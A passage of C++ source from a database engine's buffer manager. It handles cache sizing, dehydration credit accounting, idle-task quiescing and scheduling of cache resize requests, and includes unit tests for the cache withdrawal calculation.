// we are using a reference here to avoid duplicating the loop
// depending on the state of fFullyHydrated. If it is true, we'll
    // use icbCacheMaxT, which is a constant (equal to g_icbCacheMax),
// otherwise, we'll use icbPage, which is the iteration variable
// so the actual value will get updated on each iteration.
INT& icbPageT = fFullyHydrated ? icbCacheMaxT : icbPage;
for( ;icbPage <= g_icbCacheMax; icbPage++ )
{
cb += ( (__int64)g_rgcbfCachePages[icbPage] * (__int64)g_rgcbPageSize[icbPageT] );
}
Assert( g_rgcbfCachePages[icbPageInvalid] == 0 );
return cb;
}
// Used cache (i.e., !Available).
INLINE CBF CbfBFICacheUsed()
{
CBF cbf = 0;
for( INT icbPage = icbPageSmallest; icbPage <= g_icbCacheMax; icbPage++ )
{
cbf += g_rgcbfCachePages[icbPage];
}
Assert( g_rgcbfCachePages[icbPageInvalid] == 0 );
return cbf;
}
// Resources actually consumed by this buffer manager. If ViewCache is on, we don't need to count available
// buffers.
__int64 CbBFICacheBufferSize()
{
if ( g_fBFInitialized )
{
return CbBFICacheIMemoryCommitted();
}
return 0;
}
// Committed cache: used + available, not including quiesced buffers if decommitted (i.e., if running with 2KB pages or
// with view-cache enabled, quiesced buffers will be counted in because they do not get decommitted).
INLINE CBF CbfBFICacheCommitted()
{
const CBF cbfCommittedT = (CBF)g_cbfCommitted - (CBF)g_cbfNewlyCommitted;
if ( cbfCommittedT < 0 )
{
return 0;
}
return cbfCommittedT;
}
// Used cache size (i.e., !Available) considering actual hydration state.
__int64 CbBFICacheSizeUsedDehydrated()
{
return CbBFICacheUsed( fFalse );
}
// Used cache size (i.e., !Available) not considering actual hydration state, so it's the theoretical cache size
// if all the pages were fully hydrated.
__int64 CbBFICacheISizeUsedHydrated()
{
return CbBFICacheUsed( fTrue );
}
__int64 CbBFICacheIMemoryReserved()
{
return g_cbCacheReservedSize;
}
__int64 CbBFICacheIMemoryCommitted()
{
return g_cbCacheCommittedSize;
}
// Average size of a buffer.
__int64 CbBFIAveResourceSize()
{
if ( g_fBFInitialized )
{
const __int64 cbCacheSizeUsedDehydrated = CbBFICacheSizeUsedDehydrated();
const CBF cbfCacheSizeUsed = CbfBFICacheUsed();
// if no buffers, have to fake it with something.
if ( cbCacheSizeUsedDehydrated > 0 && cbfCacheSizeUsed > 0 && cbCacheSizeUsedDehydrated >= cbfCacheSizeUsed )
{
return cbCacheSizeUsedDehydrated / cbfCacheSizeUsed;
}
else
{
return g_rgcbPageSize[g_icbCacheMax];
}
}
return 0;
}
// Number of "credit-buffers" we are getting for dehydrating pages.
LONG_PTR CbfBFICredit()
{
if ( g_fBFInitialized )
{
const __int64 cbCacheSizeUsedHydrated = CbBFICacheISizeUsedHydrated();
const __int64 cbCacheSizeUsedDehydrated = CbBFICacheSizeUsedDehydrated();
// if we have 100% of the cache in a hydrated state, this can be negative for a brief period of
// time because both are updated non-atomically and we don't want to rely on the order of the
// updates, so let's be safe.
if ( cbCacheSizeUsedHydrated > cbCacheSizeUsedDehydrated )
{
return (LONG_PTR)( ( cbCacheSizeUsedHydrated - cbCacheSizeUsedDehydrated ) / g_rgcbPageSize[g_icbCacheMax] );
}
}
return 0;
}
// Averaged number of "credit-buffers" we are getting for dehydrating pages.
LONG_PTR CbfBFIAveCredit()
{
return g_avgCbfCredit.GetAverage();
}
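// returns whether the cache size is settled enough for cache size maintenance to quiesce:
// deadlock protection must not be holding the target above the optimal target, the cache must
// have reached its stable size, and any drift caused by dehydration credit must still fall
// within the sensitivity range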
BOOL FBFIMaintCacheSizeQuiescedInSensitivityRange()
{
if ( cbfCacheTarget > g_cbfCacheTargetOptimal )
{
return fFalse;
}
ULONG_PTR cbfCacheStable = 0;
ULONG_PTR cbfCacheStableNew = 0;
const ULONG_PTR cbfBFIAveCredit = (ULONG_PTR)CbfBFIAveCredit();
const ULONG_PTR cbfBFICredit = (ULONG_PTR)CbfBFICredit();
if ( FBFICacheSizeFixed() )
{
const ULONG_PTR cbfCacheTargetEffective = g_cbfCacheUserOverride ? g_cbfCacheUserOverride : UlParam( JET_paramCacheSizeMin );
cbfCacheStable = cbfCacheTargetEffective + cbfBFIAveCredit;
cbfCacheStableNew = cbfCacheTargetEffective + cbfBFICredit;
}
else
{
cbfCacheStable = cbfCacheTarget;
cbfCacheStableNew = cbfCacheStable + cbfBFICredit;
cbfCacheStableNew -= min( cbfCacheStableNew, cbfBFIAveCredit );
}
// Even if the cache size has reached its goal (i.e., cbfCacheSize == cbfCacheStable), there's
    // still a chance that dehydrations/re-hydrations are changing the amount of credit buffers
// in a measurable way, that's why we are still going to test for FBFICacheApproximatelyEqual()
// below.
if ( (ULONG_PTR)cbfCacheSize == cbfCacheStable )
{
return FBFICacheApproximatelyEqual( cbfCacheStableNew, cbfCacheStable );
}
return fFalse;
}
LOCAL ULONG g_cMaintCacheSizeReqAcquireFailures = 0;
#ifndef RTM
TICK g_tickMaintCacheStatsResizeLastAttempt = 0;
LONG_PTR g_cbfMaintCacheStatsResizeLastAttempt = 0;
TICK g_tickMaintCacheStatsResizeLast = 0;
LONG_PTR g_cbfMaintCacheStatsResizeLast = 0;
#endif // !RTM
TICK g_tickLastLowMemoryCallback = 0;
#define fIdleCacheStatTask (VOID *)1
void BFIMaintLowMemoryCallback( DWORD_PTR pvUnused )
{
// start DBA - which will take care of shrinking cache if needed
// Can only fail if we are already in the middle of shutdown
g_tickLastLowMemoryCallback = TickOSTimeCurrent();
ErrBFIMaintCacheStatsRequest( bfmcsrtForce );
}
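// gives the cache target a one-time boost when the avail pool is running low, provided the cache
// is not fixed in size and OS memory is not already scarce; the boost is fed into the RAM
// heuristics and followed by a cache size maintenance request to realize it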
void BFICacheSizeBoost()
{
if ( FBFICacheSizeFixed() )
{
return;
}
const size_t cbAvailOsMem = g_cacheram.AvailablePhysicalMemory();
const size_t cbRam = g_cacheram.TotalPhysicalMemory();
// short circuit boost if it looks irrational to run it.
if ( ( cbAvailOsMem < ( cbRam / 10 ) ) && // avail OS memory "low" ... < 10% RAM
         ( ( (size_t)cbfCacheSize * (size_t)g_rgcbPageSize[g_icbCacheMax] ) > ( cbRam / 10 ) ) )    // our own cache is already more than 10% of total memory
{
return;
}
if ( ( cbAvailOsMem < ( cbRam / 20 ) ) ) // avail OS memory "super low" ... < 5% RAM
{
return;
}
g_critCacheSizeSetTarget.Enter();
ULONG_PTR cbfRealCacheSize;
LONG_PTR cbBoost;
CallS( ErrBFGetCacheSize( &cbfRealCacheSize ) );
cbBoost = min( ( cbfAvailPoolHigh - (LONG_PTR)g_bfavail.Cobject() ) * g_rgcbPageSize[g_icbCacheMax],
(LONG_PTR)cbAvailOsMem / 2 );
if ( cbfRealCacheSize >= UlParam( JET_paramCacheSizeMax ) ||
cbBoost <= 0 )
{
g_critCacheSizeSetTarget.Leave();
return;
}
g_cCacheBoosts++;
g_cbCacheBoosted += cbBoost;
g_cacheram.OverrideResourceAdjustments( (double)cbBoost );
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
g_critCacheSizeSetTarget.Leave();
OnDebug( BOOL fAcquiredSemaphore = fFalse );
// Disable cleanup checking
// The boost is an optimization, cache sizing in the background will still try to achieve the correct cache size.
// So allocations in this path do not need to be checked for cleanup path checking.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
(void)ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
}
LOCAL void BFIMaintIdleCacheStatsSchedule()
{
// This is the catch-all task that runs infrequently to handle cases where
// we've quiesced all the cache sizing tasks, but external factors changed
    // significantly and would require us to re-evaluate our optimal size calculation.
// This might go off from ErrBFICacheInit(), which gets called before ErrBFIMaintInit(),
// so we need to check for its initialization state.
Expected( ( g_posttBFIMaintIdleCacheStatsITask != NULL ) || !g_fBFInitialized );
if ( g_posttBFIMaintIdleCacheStatsITask != NULL )
{
(void)ErrBFIMaintScheduleTask( g_posttBFIMaintIdleCacheStatsITask, NULL, dtickIdleCacheStatsPeriod, dtickIdleCacheStatsSlop );
}
}
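// FBFICleanBuffer(): returns whether the buffer at the given IBF is clean enough to be evicted;
// the unit test build substitutes a version that can simulate a partially dirty cache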
#ifndef ENABLE_JET_UNIT_TEST
LOCAL INLINE BOOL FBFICleanBuffer( const IBF ibf )
{
if ( ( ibf < cbfInit ) && !FBFIIsCleanEnoughForEvict( PbfBFICacheIbf( ibf ) ) )
{
return fFalse;
}
return fTrue;
}
#else // ENABLE_JET_UNIT_TEST
LOCAL BOOL g_fSimulateDirtyCache = fFalse;
LOCAL BOOL FBFICleanBuffer( const IBF ibf )
{
if ( g_fSimulateDirtyCache && ( ( ibf % 2 ) == 0 ) )
{
return fFalse;
}
return fTrue;
}
#endif // !ENABLE_JET_UNIT_TEST
LOCAL LONG_PTR CbfBFIMaintIdleCacheStatsWithdrawal(
const LONG_PTR cbfTargetCacheSizeCurrent,
const LONG_PTR cbfTargetCacheSizeMin,
const LONG_PTR dcbfLastWithdrawalThreshold,
BOOL* const pfTooManyUncleanPages )
{
Expected( cbfTargetCacheSizeCurrent >= 0 );
Expected( cbfTargetCacheSizeMin >= 0 );
Expected( dcbfLastWithdrawalThreshold > 0 );
Assert( pfTooManyUncleanPages != NULL );
// Shrink halfway down to the preferred min. cache size.
// If we get to a certain threshold above min, shrink all the way down.
LONG_PTR cbfTargetCacheSizeNew = cbfTargetCacheSizeMin + ( cbfTargetCacheSizeCurrent - cbfTargetCacheSizeMin ) / 2;
if ( cbfTargetCacheSizeNew <= ( cbfTargetCacheSizeMin + dcbfLastWithdrawalThreshold ) )
{
cbfTargetCacheSizeNew = cbfTargetCacheSizeMin;
}
*pfTooManyUncleanPages = fFalse;
CPG cbfUnclean = 0;
for ( IBF ibf = cbfTargetCacheSizeCurrent - 1; ibf >= cbfTargetCacheSizeNew; ibf-- )
{
if ( FBFICleanBuffer( ibf ) )
{
continue;
}
if ( ++cbfUnclean > cbfIdleCacheUncleanThreshold )
{
*pfTooManyUncleanPages = fTrue;
cbfTargetCacheSizeNew = ibf + 1;
break;
}
}
return cbfTargetCacheSizeNew;
}
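// BFIMaintIdleCacheStatsITask(): the idle cache stats task.
//
// o On regular configurations it simply refreshes cache stats and reschedules itself;
//
// o On low-memory / low-power profiles it aggressively shrinks the cache toward its preferred
// minimum (limiting shrinkage if too many unclean pages are found) and quiesces itself once
// no further shrinkage is possible or the cache size falls within the sensitivity range.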
void BFIMaintIdleCacheStatsITask( VOID *pvGroupContext, VOID * )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
    // Quiesce the task immediately if the cache is fixed and we're within the desired range.
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && FBFICacheSizeFixed() )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to fixed cache size within sensitivity range.", __FUNCTION__ ) );
return;
}
// If not low-memory or low-power profiles, do not bother trying to quiesce
// this task, just update statistics and reschedule it.
if ( !FJetConfigLowMemory() && !FJetConfigLowPower() )
{
if ( FBFIMaintCacheStatsTryAcquire() )
{
BFIMaintCacheStatsITask( pvGroupContext, fIdleCacheStatTask );
BFIMaintCacheStatsRelease();
}
goto Reschedule;
}
// If the cache is not fixed and quiesced, and we're running on low-memory or low-power profiles,
// do not bother updating statistics: always try to aggressively shrink the cache so we can quiesce
// this task.
g_critCacheSizeSetTarget.Enter();
// Calculate how much to shrink. Take cbfCacheDeadlock into account when determining the min.
// That variable does not account for credit buffers, but that should not impact the final result
// of our calculation significantly: we're choosing to call it quiesced if we get to cbfCacheDeadlock
    // to avoid further flushing and to reduce the likelihood that this task and the cache resizing task fail to quiesce.
// The new size calculation also returns whether or not we have decided to limit shrinkage due to too
    // many unclean pages, which can potentially cause a flush storm. We'll decide not to quiesce the task
    // if that happens.
BOOL fTooManyUncleanPages = fFalse;
const LONG cbPageSize = g_rgcbPageSize[g_icbCacheMax];
const LONG_PTR cbfTargetCacheSizeCurrent = (LONG_PTR)( g_cacheram.GetOptimalResourcePoolSize() / cbPageSize );
const LONG_PTR cbfTargetCacheSizeMin = (LONG_PTR)( max( max( UlParam( JET_paramCacheSizeMin ), (ULONG_PTR)cbfCacheMinMin ), (ULONG_PTR)cbfCacheDeadlock ) );
const LONG_PTR dcbfLastWithdrawalThreshold = dcbIdleCacheLastWithdrawalThreshold / cbPageSize;
const LONG_PTR cbfTargetCacheSizeNew = CbfBFIMaintIdleCacheStatsWithdrawal( cbfTargetCacheSizeCurrent, cbfTargetCacheSizeMin, dcbfLastWithdrawalThreshold, &fTooManyUncleanPages );
const LONG_PTR dcbfCacheSize = cbfTargetCacheSizeNew - cbfTargetCacheSizeCurrent;
OSTrace(
JET_tracetagBufferManagerMaintTasks,
OSFormat(
"%s: cache sizing from %Id to %Id buffers (min. size is %Id buffers, too-many-unclean is %d).",
__FUNCTION__,
cbfTargetCacheSizeCurrent,
cbfTargetCacheSizeNew,
cbfTargetCacheSizeMin,
fTooManyUncleanPages ) );
AssertSz( !fTooManyUncleanPages || ( dcbfCacheSize <= -cbfIdleCacheUncleanThreshold ),
"We must only have limited shrinkage if we are shrinking by more than the unclean threshold." );
// Quiesce the task if we can't shrink further.
if ( dcbfCacheSize >= 0 )
{
Assert( !fTooManyUncleanPages );
g_critCacheSizeSetTarget.Leave();
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to non-negative cache size change.", __FUNCTION__ ) );
return;
}
// Override set-point (may cause resizing task to kick-off).
g_cacheram.OverrideResourceAdjustments( (double)( dcbfCacheSize * g_rgcbPageSize[g_icbCacheMax] ) );
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
// The cache size might have concurrently fallen into the sensitivity range while we were setting the new target.
// Do not quiesce yet if we limited shrinkage.
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && !fTooManyUncleanPages )
{
g_critCacheSizeSetTarget.Leave();
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: quiesced due to variable cache size within sensitivity range.", __FUNCTION__ ) );
return;
}
g_critCacheSizeSetTarget.Leave();
// Finally, move on to request cache resizing and reschedule itself.
#ifdef DEBUG
if ( dtickIdleCacheStatsPeriod >= 60 * 1000 )
{
const TICK dtickLastCacheStatsRequest = DtickDelta( g_tickLastCacheStatsRequest, TickOSTimeCurrent() );
AssertSz(
( dtickLastCacheStatsRequest >= ( dtickIdleCacheStatsPeriod / 2 ) ) || // Can't be too recent.
( dtickLastCacheStatsRequest <= 1 * 1000 ), // To cover a tiny window where we could be just coming out of idle.
"Last active cache request was too recent (%u msec ago).", dtickLastCacheStatsRequest );
}
#endif // DEBUG
OnDebug( BOOL fAcquiredSemaphore = fFalse );
// Disable cleanup checking. If we fail on any cleanup codepath, the next
// run of this task will try and makes things right again.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
(void)ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
Reschedule:
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: rescheduled.", __FUNCTION__ ) );
BFIMaintIdleCacheStatsSchedule();
return;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalBasic )
{
// Start with 200 pages, min. is 10, threshold to shrink to min. is 22 (12 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 200, 10, 12, &fTooManyUncleanPages ) == 105 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 105, 10, 12, &fTooManyUncleanPages ) == 57 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 57, 10, 12, &fTooManyUncleanPages ) == 33 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 33, 10, 12, &fTooManyUncleanPages ) == 10 ); // All the way down to min.
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalBasicDirty )
{
// Start with 200 pages, min. is 10, threshold to shrink to min. is 22 (12 above min).
g_fSimulateDirtyCache = fTrue;
BOOL fTooManyUncleanPages = fFalse;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 200, 10, 12, &fTooManyUncleanPages ) == 159 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 159, 10, 12, &fTooManyUncleanPages ) == 119 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 119, 10, 12, &fTooManyUncleanPages ) == 79 );
CHECK( fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 79, 10, 12, &fTooManyUncleanPages ) == 44 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 44, 10, 12, &fTooManyUncleanPages ) == 27 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 27, 10, 12, &fTooManyUncleanPages ) == 10 ); // All the way down to min.
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalAlreadyQuiesced )
{
// Start with 100 pages, min. is also 100, variable thresholds.
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 1, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 50, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 100, 100, &fTooManyUncleanPages ) == 100 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalCurrentBelowMin )
{
// Start with 100 pages, min. is 110.
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 1, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 10, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 110, 50, &fTooManyUncleanPages ) == 110 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalStartBelowThreshold )
{
// Start with 100 pages, min. is 10, threshold to shrink to min. is 110 (100 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 10, 100, &fTooManyUncleanPages ) == 10 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalQuiesceOnFirst )
{
// Start with 100 pages, min. is 50, threshold to shrink to min. is 75 (25 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 50, 25, &fTooManyUncleanPages ) == 50 );
CHECK( !fTooManyUncleanPages );
}
JETUNITTEST( BF, BFIMaintIdleCacheStatsWithdrawalQuiesceOnSecond )
{
// Start with 100 pages, min. is 50, threshold to shrink to min. is 74 (24 above min).
g_fSimulateDirtyCache = fFalse;
BOOL fTooManyUncleanPages = fTrue;
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 100, 50, 24, &fTooManyUncleanPages ) == 75 );
CHECK( !fTooManyUncleanPages );
CHECK( CbfBFIMaintIdleCacheStatsWithdrawal( 75, 50, 24, &fTooManyUncleanPages ) == 50 );
CHECK( !fTooManyUncleanPages );
}
#endif // ENABLE_JET_UNIT_TEST
// BFIMaintCacheStatsITask(): the DBA task.
//
// o Calls into resource manager functions to retrieve the optimal cache size and
// set the optimal size as the next cache set point;
//
// o Attempts to resize the cache (shrink quiesced buffers or grow the cache). This
// may not happen if the protecting semaphore can't be acquired, in which case a
// pending request will be registered so that resizing will occur later when the
// semaphore owner releases ownership;
//
// o Pushes the idle cache stats task further out into the future;
//
// o Finally, it quiesces itself if the cache size is within acceptable quiescing ranges.
void BFIMaintCacheStatsITask( VOID *, VOID * pvContext )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
const TICK tickNow = TickOSTimeCurrent();
AtomicExchange( (LONG *)&g_tickLastMaintCacheStats, tickNow );
    Assert( g_semMaintCacheStatsRequest.CAvail() == 0 /* as close to FOwner() as we can get */ );
g_critCacheSizeSetTarget.Enter();
// update our RAM stats. this will also grow the cache if appropriate
// Note: This is a complicated way of setting cbfCacheNew.
g_cacheram.UpdateStatistics();
g_cacheram.SetOptimalResourcePoolSize(); // note: this calls g_cacheram.ConsumeResourceAdjustments()
// attempt to resize the cache to the new cache size
OnNonRTM( g_tickMaintCacheStatsResizeLastAttempt = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheStatsResizeLastAttempt = cbfCacheTarget );
g_critCacheSizeSetTarget.Leave();
OnDebug( BOOL fAcquiredSemaphore = fFalse );
const ERR errMaintCacheSize = ErrBFIMaintCacheSizeRequest( OnDebug( &fAcquiredSemaphore ) );
#ifndef RTM
if ( errMaintCacheSize >= JET_errSuccess )
{
OnNonRTM( g_tickMaintCacheStatsResizeLast = TickOSTimeCurrent() );
OnNonRTM( g_cbfMaintCacheStatsResizeLast = cbfCacheTarget );
}
#endif // !RTM
#ifdef DEBUG
if ( fAcquiredSemaphore )
{
g_cMaintCacheSizeReqAcquireFailures = 0;
}
else
{
// we've failed to acquire the semaphore to schedule the task. this means the task must be executing
// right now or in the process of rescheduling itself to complete its job.
S_ASSERT( dtickMaintCacheSizeRequest <= ( dtickMaintCacheStatsPeriod / 2 ) );
g_cMaintCacheSizeReqAcquireFailures++;
const TICK dtickOrphanedTaskThreshold = (TICK)UlConfigOverrideInjection( 57528, cmsecDeadlock );
Expected( dtickOrphanedTaskThreshold >= dtickMaintCacheStatsPeriod );
Expected( g_cMaintCacheSizeReqAcquireFailures <= ( dtickOrphanedTaskThreshold / dtickMaintCacheStatsPeriod ) );
}
#endif // DEBUG
// If it is the idle cache-stats task, we do not need to cancel anything
if ( pvContext == fIdleCacheStatTask )
{
return;
}
BFIMaintIdleCacheStatsSchedule();
// If our cache size cannot change then we will deactivate cache size
// maintenance. Also, if we no longer need to worry about the cache size
// then we no longer need to collect cache stats so we will deactivate
// their collection as well. Do not quiesce the task if we are operating
// in an over-allocated situation due to deadlock protection, except for
// a battery-operated device, in which case we'll opt for saving battery
// over achieving an optimal cache size.
BOOL fQuiesceTask = fFalse;
if ( ( ( DtickDelta( g_tickLastCacheStatsRequest, tickNow ) > dtickMaintCacheStatsQuiesce ) || FBFIMaintCacheSizeQuiescedInSensitivityRange() ) &&
( ( cbfCacheDeadlock <= g_cbfCacheTargetOptimal ) || FUtilSystemRestrictIdleActivity() ) )
{
BOOL fLowMemory;
// Before deciding to quiesce the task, make sure that we register for
// the low memory notification successfully
if ( ErrOSQueryMemoryNotification( g_pMemoryNotification, &fLowMemory ) >= JET_errSuccess &&
!fLowMemory &&
ErrOSRegisterMemoryNotification( g_pMemoryNotification ) >= JET_errSuccess )
{
fQuiesceTask = fTrue;
}
}
if ( !fQuiesceTask &&
ErrBFIMaintScheduleTask( g_posttBFIMaintCacheStatsITask, NULL, dtickMaintCacheStatsPeriod, dtickMaintCacheStatsSlop ) >= JET_errSuccess )
{
// do not need to release the semaphore since we rescheduled ourselves
return;
}
BFIMaintCacheStatsRelease();
}
TICK g_tickLastMaintCacheSizeRequestSuccess = 0;
// ErrBFIMaintCacheStatsRequest(): tries to kick off BFIMaintCacheStatsITask.
//
// o Schedules the cache idle stats maintenance task;
//
// o Returns immediately if the cache is already at the right size. In theory
// this would not be required because the task would quiesce itself, but
// we just want to save an extra unnecessary scheduling;
//
// o Schedules BFIMaintCacheStatsITask.
INLINE ERR ErrBFIMaintCacheStatsRequest( const BFIMaintCacheStatsRequestType bfmcsrt )
{
ERR err = JET_errSuccess;
BOOL fReleaseSemaphore = fFalse;
const BOOL fForce = ( bfmcsrt == bfmcsrtForce );
const TICK tickNow = TickOSTimeCurrent();
// this may go slightly backwards but it is not a big deal
if ( DtickDelta( g_tickLastCacheStatsRequest, tickNow ) > 0 )
{
g_tickLastCacheStatsRequest = tickNow;
}
// quick check to see if we should schedule a task - we may not schedule
// the task if it was scheduled recently - not a big deal
if ( !fForce && ( DtickDelta( g_tickLastMaintCacheStats, tickNow ) < dtickMaintCacheStatsTooOld ) )
{
goto HandleError;
}
// ignore the request if our cache size cannot change
//
// variable-sized caches (DBA) should not drop the task
// based solely on the sensitivity calculation because they
// need the actual task to run in order to update the statistics
// to make the decision to quiesce cache sizing.
//
if ( FBFIMaintCacheSizeQuiescedInSensitivityRange() && FBFICacheSizeFixed() )
{
goto HandleError;
}
// try to acquire the right to request cache stats maintenance
if ( FBFIMaintCacheStatsTryAcquire() )
{
fReleaseSemaphore = fTrue;
g_tickLastMaintCacheSizeRequestSuccess = TickOSTimeCurrent();
// upon successfully scheduling the cache stats task below, there would be no need to run the idle
// stats task anymore, we could just cancel the idle stats task, but scheduling cancelled tasks is
// not encouraged so we'll just push the task further out
BFIMaintIdleCacheStatsSchedule();
// schedule a task to maintain our cache stats which will in turn manage
// our cache size maintenance
Call( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheStatsITask, NULL, dtickMaintCacheStatsPeriod, dtickMaintCacheStatsSlop ) );
fReleaseSemaphore = fFalse;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Stats Collection", __FUNCTION__ ) );
}
HandleError:
if ( fReleaseSemaphore )
{
BFIMaintCacheStatsRelease();
}
return err;
}
INLINE BOOL FBFIMaintCacheStatsTryAcquire()
{
return g_semMaintCacheStatsRequest.FTryAcquire();
}
INLINE void BFIMaintCacheStatsRelease()
{
Assert( g_semMaintCacheStatsRequest.CAvail() == 0 );
g_semMaintCacheStatsRequest.Release();
}
POSTIMERTASK g_posttBFIMaintCacheSizeITask = NULL;
#ifndef RTM
TICK g_tickMaintCacheSizeRequestLast = 0;
TICK g_tickMaintCacheSizeRequestSyncLastAttempt = 0;
TICK g_tickMaintCacheSizeRequestSyncLastSuccess = 0;
TICK g_tickMaintCacheSizeRequestAsyncLastAttempt = 0;
TICK g_tickMaintCacheSizeRequestAsyncLastSuccess = 0;
#endif // !RTM
// ErrBFIMaintCacheSizeRequest(): tries to resize the cache.
//
// o Tries to acquire the right to resize the cache. If it fails, a pending request
// will be registered so the current owner of the semaphore will take care of it;
//
// o If the next target cache size indicates growth, tries to resize it synchronously.
// If it fails, tries to resize it asynchronously by scheduling BFIMaintCacheSizeITask;
//
// o If the cache needs shrinking, jump straight to the asynchronous resizing because
// the asynchronous buffer quiescing task needs to go through the buffers to
// evict/flush them first.
INLINE ERR ErrBFIMaintCacheSizeRequest( OnDebug( BOOL* const pfAcquiredSemaphoreCheck ) )
{
ERR err = JET_errSuccess;
BOOL fReleaseSemaphore = fFalse;
BOOL fNeedsAsyncSizing = fFalse;
OnNonRTM( g_tickMaintCacheSizeRequestLast = TickOSTimeCurrent() );
if ( !FBFIMaintCacheSizeAcquire() )
{
goto HandleError;
}
fReleaseSemaphore = fTrue;
AtomicExchange( &g_cMaintCacheSizePending, 0 );
#ifdef DEBUG
if ( pfAcquiredSemaphoreCheck != NULL )
{
*pfAcquiredSemaphoreCheck = fTrue;
}
#endif // DEBUG
// If the cache needs to grow, try to resize it synchronously.
// There is no point in shrinking it synchronously because
// the asynchronous buffer quiescing task needs to go through
// the buffers to evict/flush them first.
const LONG_PTR cbfCacheTargetT = cbfCacheTarget;
if ( cbfCacheTargetT > cbfCacheSize )
{
OnNonRTM( g_tickMaintCacheSizeRequestSyncLastAttempt = TickOSTimeCurrent() );
// If the synchronous cache resizing does not work, try and
// schedule it asynchronously.
if ( ErrBFICacheGrow() < JET_errSuccess )
{
fNeedsAsyncSizing = fTrue;
}
else
{
OnNonRTM( g_tickMaintCacheSizeRequestSyncLastSuccess = TickOSTimeCurrent() );
goto HandleError;
}
}
else if ( cbfCacheTargetT < cbfCacheSize )
{
fNeedsAsyncSizing = fTrue;
}
else if ( g_cbfCacheTargetOptimal < cbfCacheTargetT )
{
// The scavenging algorithm is responsible for maintaining cbfCacheDeadlock,
// which may get stale at a higher-than-desirable value on idle systems, preventing
// the cache from shrinking further, so force resizing if that threshold exceeds
// the optimal size to get that value updated.
Assert( cbfCacheTargetT == cbfCacheSize );
fNeedsAsyncSizing = fTrue;
}
// Check if we need asynchronous sizing.
if ( fNeedsAsyncSizing )
{
OnNonRTM( g_tickMaintCacheSizeRequestAsyncLastAttempt = TickOSTimeCurrent() );
Call( ErrBFIMaintScheduleTask( g_posttBFIMaintCacheSizeITask,
NULL,
dtickMaintCacheSizeRequest,
0 ) );
OnNonRTM( g_tickMaintCacheSizeRequestAsyncLastSuccess = TickOSTimeCurrent() );
fReleaseSemaphore = fFalse;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "%s: started Cache Size Maintenance", __FUNCTION__ ) );
}
HandleError:
if ( fReleaseSemaphore )
{
const ERR errT = ErrBFIMaintCacheSizeReleaseAndRescheduleIfPending();
if ( err >= JET_errSuccess )
{
err = errT;
